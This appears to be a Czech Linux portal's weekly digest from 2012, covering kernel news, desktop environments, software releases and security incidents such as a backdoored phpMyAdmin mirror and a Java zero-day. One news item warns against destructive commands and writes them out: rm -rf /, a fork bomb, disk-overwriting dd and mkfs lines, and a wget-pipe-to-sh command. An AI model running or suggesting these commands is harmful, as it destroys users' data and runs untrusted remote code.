Portál AbcLinuxu, 16. května 2025 19:26
Ucelený přehled článků, zpráviček a diskusí za minulých 7 dní.
Ucelený přehled článků, zpráviček a diskusí za minulých 7 dní.
Komiks xkcd 309: Když dva nakupujíXKCD česky.
Jaderné noviny – 7. 9. 2012: Ulehčení života distribucímAktuální verze jádra: 3.6-rc4. Citáty týdne: The Economist, Andrew Morton, Steven Rostedt, Alan Cox. Jaderný summit 2012: Regresní testování: Trinity: inteligentní fuzz testing; Regresní benchmarky. Jaderný summit 2012: Distribuce a upstream.
PowerLinux umožní klientům dosáhnout vyšší efektivity a získat lepší informaceIBM představila řešení IBM PowerLinux Systems and Solutions, které klientům umožní využít cenových výhod systému Linux a virtualizací pro kritické zátěže. IBM PowerLinux Solutions nabízí plnou integraci nového hardwaru POWER7, vyvinutého speciálně pro Linux, a standardního „linuxového“ softwaru od Red Hat a SUSE pro analýzu velkých dat, správu specifických aplikací a nabízení služeb postavených na otevřené infrastruktuře.
TDE a MATE: staré dobré KDE 3 a GNOME 2Linuxový desktop v posledních letech zažil zemětřesení. Nejprve bylo již vyladěné KDE 3.5 v distribucích nahrazeno zdaleka nehotovým KDE 4.0, Canonical začal v Ubuntu tlačit Unity a ani vývojáři GNOME se příliš nepoučili — GNOME 3 a především Gnome Shell mezi uživateli sklízí rozporuplné reakce. Někdo se změnám přizpůsobil, někdo utekl k lehkotonážním prostředím s Xfce v čele — a několik lidí se rozhodlo, že využije síly svobodného softwaru a bude udržovat KDE 3 a GNOME 2. Tak vznikly projekty Trinity Desktop Environment a MATE.
Píšeme pravidla pro udevUdev před přibližně šesti lety definitivně nahradil starého, jaderného správce adresáře /dev zvaného devfs. K této změně došlo v Linuxu 2.6.18. My se podíváme na schopnosti udevu, ale také na částečný návrat devfs zpět do našich jader.
Komiks xkcd 340: HádkaXKCD česky.
HW novinky: Photokina 2012 speciál #1Dva roky se se dvěma roky sešly, a tak tu máme tradiční monstrakci zvanou Photokina. To se vždy po dvou letech v Kolíně slezou firmy, které mají alespoň něco společného s fotografií a snaží se vzájemně trumfnout. A že letos vytáhly opravdu zajímavé trumfy…
HW novinky: ukládání dat à la Hitachi, přeživší pády civilizacíKromě nově vyvíjeného systému pro extrémně dlouhodobé a odolné ukládání dat, na kterém pracují vědci v japonské společnosti Hitachi, se dnes podíváme i na další zajímavá témata, včetně například výhledu na 14nm výrobní proces GlobalFoundries, který slibuje příchod „3D“ tranzistorů ne nepodobných těm z 22nm Intelova procesu, a také čerstvý standard DDR4 pamětí vydaný konsorciem JEDEC…
Vývojářské studio Obsidian Entertainment (KotOR 2, NWN 2, F:NV) oznámilo, že hra vyvíjená pod pracovním názvem Project Eternity bude i pro Linux. Obsidian se považuje za nástupce zaniklých Black Isle Studios (Fallout, Planescape) a jejich nový projekt má být RPG právě ve stylu těchto klasik. Project Eternity je financován pomocí Kickstarteru a cílové částky 1,1 mil. dolarů dosáhl během prvních dvou dní, v současnosti se nasbíralo již přes 1,8 mil. dolarů.
Írán zablokoval svému obyvatelstvu přístup ke službám od firmy Google. Údajně jde o reakci na to, že právě na YouTube se nachází video, které pobouřilo muslimský svět.
Na How-To Geek vyšel článek 8 smrtelných příkazů, jež byste nikdy neměli spouštět na Linuxu, a to ani v případě, nebo především, pokud jsou doporučeny v linuxové poradně. How-To Geek vybral příkaz rm -rf / a jeho variace aneb muzu nejak stopnou zabehu ftp server?, vidličkovou bombu (fork bomb) ":(){ :|: & };:" aneb testování výkonnosti systému, formátování diskového oddílu "mkfs.ext4 /dev/sda1" aneb jak najít místo na disku, uložení výstupu příkazu do souboru "command > /dev/sda", testování generátoru náhodných čísel "dd if=/dev/random of=/dev/sda", zálohování domovského adresáře "mv ~ /dev/null" a spuštění opravného skriptu "wget http://example.com/something -O – | sh". Přidat lze ruskou ruletu "[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /*" a mnoho dalších.
Do vyhledávání v Ubuntu 12.10 (beta) bylo zahrnuto vyhledávání zboží na serveru Amazon. Uživatel chce spustit aplikaci shotwell a Ubuntu mu doporučí související knihy (obrázek). Uživatel by rád spustil terminál a Ubuntu mu nabídne termální pastu (obrázek). Ke kontroverzní nové vlastnosti se vyjádřil i Mark Shuttleworth na svém blogu. Nejedná se o reklamu. Ubuntu nabízí uživatelům možnost vyhledání čehokoli kdekoli. Nabídka zboží je volitelná.
Dnes začíná Fedora 18 X Test Week. Jedná se o jednu z nejoblíbenějších testovacích událostí pro uživatele a vývojáře Fedory. Máte staré nebo nové grafické karty nVidia, ATI nebo Intel? A fungují správně pod Fedorou? Zúčastněte se testovacích týdne a pomozte komunitě ulovit bugy v ovladačích než vyjde betaverze Fedory 18!
Informace jak se můžete zapojit najdete v následujícím rozvrhu: 2012-09-25 Nouveau 2012-09-26 Radeon 2012-09-27 Intel Připojte se na IRC #fedora-test-day na FreeNode a požádejte QA nebo vývojáře o pomoc, pokud narazíte během testování na problémy. Rádi vám pomůžeme s debugováním a hlášením bugů. Všechny nalezené bugy hlaste do Bugzilly pod příslušnou komponentu. Můžete hlásit i bugy nesouvisející s testovacím týdnem. Ptejte se QA pokud si nejste jistí proti které komponentě daný bug nahlásit. Na viděnou v Bugzille!Podařilo se získat materiály s návrhy v projektu Evropské komise zvaném CleanIT. Plány popsané v tomto projektu je možné popsat jen jako internetovou totalitu: odstranění legislativy bránící filtrování a sledování provozu, odstranění právních formalit kolem odstraňování obsahu, omezení online anonymity, aktivní monitorování "teroristické aktivity" ze strany ISP, zodpovědnost ISP za obsah, podpora firmám na základě toho, jak dobře "spolupracují", postavení odkazování na teroristický obsah mimo zákon nebo blacklisty domén, které se nesmějí registrovat.
Seriál o 30 vývojářích linuxového jádra ve třiceti týdnech na Linux.com pokračuje rozhovorem s Jiřím Slabým. Jiří Slabý se sází, že čtenáři nezvládnou jeho jméno přečíst a už vůbec vyslovit. Je zaměstnancem SUSE. Používá vim, git a KDE. Při programování poslouchá heavy metal, thrash metal a rock. Občas bluegrass.
Firma Adobe uvolnila font Source Code Pro pod licencí Open Font License 1.1. Jak název trochu napovídá, jde o monospace font pro programátory.
phpMyAdmin, konkrétně jeho balíček phpMyAdmin-3.5.2.2-all-languages.zip, byl po omezenou dobu šířen z jednoho z mirrorů SourceForge s backdoorem. Závadný korejský mirror cdnetworks-kr-1 byl zakázán, závadný soubor byl ale mezitím stažen 400x. Závadný archiv obsahuje soubor server_sync.php umožňující spouštění kódu na serveru.
Dvaadvacítková řada webového prohlížeče Google Chrome byla prohlášena za stabilní. Dle oznámení bylo ve verzi 22.0.1229.79 opraveno 43 bezpečnostních chyb. Nálezcům 13 bezpečnostních chyb bylo vyplaceno dohromady 29 500 dolarů. Sergej Glazunov za nahlášení 2 chyb získal 15 000 dolarů. Částkou 5 000 dolarů byli odměnění nálezci bezpečnostní chyby CVE-2012-2897 v jádře Windows 7. Řada z bezpečnostních chyb byla detekována pomocí nástroje AddressSanitizer. Nová řada Chrome přináší podporu uzamčení myši pro webové aplikace (Mouse Lock API availability for Javascript). Z oficiální nápovědy: "Webové stránky se mohou zmocnit ukazatele myši a zbavit uživatele možnosti jej ovládat. Údaje o pohybu myši jsou nasměrovány výhradně do webové aplikace. Uživatelé se z takové situace mohou dostat stisknutím klávesy Esc." S novým Chrome si tak například lze zahrát 3D střílečku BananaBread. Další informace v blogu.
Sdružení CZ.NIC dnes představilo své nové logo a zároveň i značku .CZ. Tento krok odstartoval postupnou změnu celé vizuální identity sdružení, která se uskuteční v průběhu následujících měsíců.
Nový grafický kabát tak dostanou mimo jiné i loga jednotlivých oddělení a projektů CZ.NIC (například Laboratoře CZ.NIC) či internetové stránky www.nic.cz. Nová značka .CZ pak má pomoci především registrátorům s propagací české národní domény směrem ke koncovým zákazníkům. Sdružení CZ.NIC změnilo své logo naposledy při přechodu na nový registrační systém FRED. Tato událost se uskutečnila na začátku října 2007, tedy téměř přesně před pěti lety. Více v tiskové zprávě na webu CZ.NIC.IEEE, Institute of Electrical and Electronics Engineers (Institut pro elektrotechnické a elektronické inženýrství), potvrdil narušení bezpečnosti. Z IEEE.org unikl seznam téměř 100 000 uživatelských účtů a jim odpovídajícím heslům v otevřeném tvaru. Více na IEEE log. Vědci jsou taky jenom lidé. Nejpoužívanější hesla byla 123456, ieee2012, 12345678, 123456789 a password. IEEE doporučuje změnu hesla.
Den po vydání Javy SE verze 7u7, jež opravovala zero-day zranitelnost, tj. 31. srpna, bylo bezpečnostním expertem Adamem Gowdiakem, zakladatelem a výkonným ředitelem Security Explorations, oznámeno nalezení další zranitelnosti. Společnost Oracle byla informována. I po téměř měsíci je verze 7u7 pořád poslední stabilní verzí. Adam Gowdiak se svou společností pokračoval v zkoumání a objevil další vážnou zranitelnost. Tentokrát zneužitelnou v Javě SE verze 5, 6 a 7. Zranitelnost umožňuje vytvoření aplikací, jež dokážou obejít bezpečnostní sandbox a na úrovni operačního systému spustit libovolný kód s právy uživatele. Adam Gowdiak uvádí, že se jedná o jejich jubilejní 50. nalezený problém v Javě, a tento poslední je exkluzivně věnován konferenci JavaOne 2012 konané od 30. září v San Franciscu.
Na konec listopadu připravuje sdružení CZ.NIC již pátý ročník konference Internet a Technologie (IT 12). Ta se zatím vždy konala v polovině roku. Protože ale v tu dobu proběhla akce ke Světovému dni IPv6 - IPv6 Day, rozhodli se její organizátoři uspořádat toto tradiční setkání na konci roku a v jiném dni, než bylo dosud zvykem. Více informací včetně žádosti o názor na termín konání konference najdete v dnešním blogpostu na blogu CZ.NIC.
Vyšlo GNOME 3.6. Změn se dočkal Nautilus (což dokonce vedlo k forku), změnil se vzhled přehledu aktivit stejně jako dalších součástí, dále vylepšení směřovala do GNOME Disks nebo IM klienta Empathy.
Vyšel GStreamer 1.0. Změny se točí hlavně kolem správy paměti.
Hardwarová poradna | Reakcí | Poslední |
Aku UPS pre Raspberry Pi? | 17 | včera 23:23 |
RFID čtečka | 2 | 26.9. 23:37 |
Odstranění popisků z klávesnice | 5 | včera 23:11 |
USB WiFi karta co bezpečně umí AP v linuxu? | 0 | včera 22:34 |
Databázová poradna | Reakcí | Poslední |
generování db v postgresu | 9 | 26.9. 10:41 |
Updgrade php 5.2 na 5.3 - old_password změna na "new password" | 27 | 26.9. 22:14 |
Jak odstranit uživatele v mysql | 1 | 24.9. 19:24 |
Programovací poradna | Reakcí | Poslední |
Jaký PHP framework zvolit? | 8 | 27.9. 11:58 |
Mysql dotaz | 27 | 26.9. 17:17 |
Zjištění prvního znaku v bashi | 8 | 27.9. 00:50 |
BASH: Jak nedokončit while | 3 | 26.9. 19:21 |
jak se ve swingu vytvari gui | 6 | včera 13:20 |
Nefunguje podmínky v bash | 6 | 27.9. 18:36 |
Je Pyside mrtev? | 3 | včera 19:52 |
QT+Windows znakové sady | 6 | včera 19:20 |
Android - activity - best practice | 0 | včera 14:37 |
Unixová poradna | Reakcí | Poslední |
Můj /etc/fonts/local.conf | 0 | včera 17:48 |
Nové IT a linuxové nabídky zaměstnání ze serveru www.abcprace.cz.
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.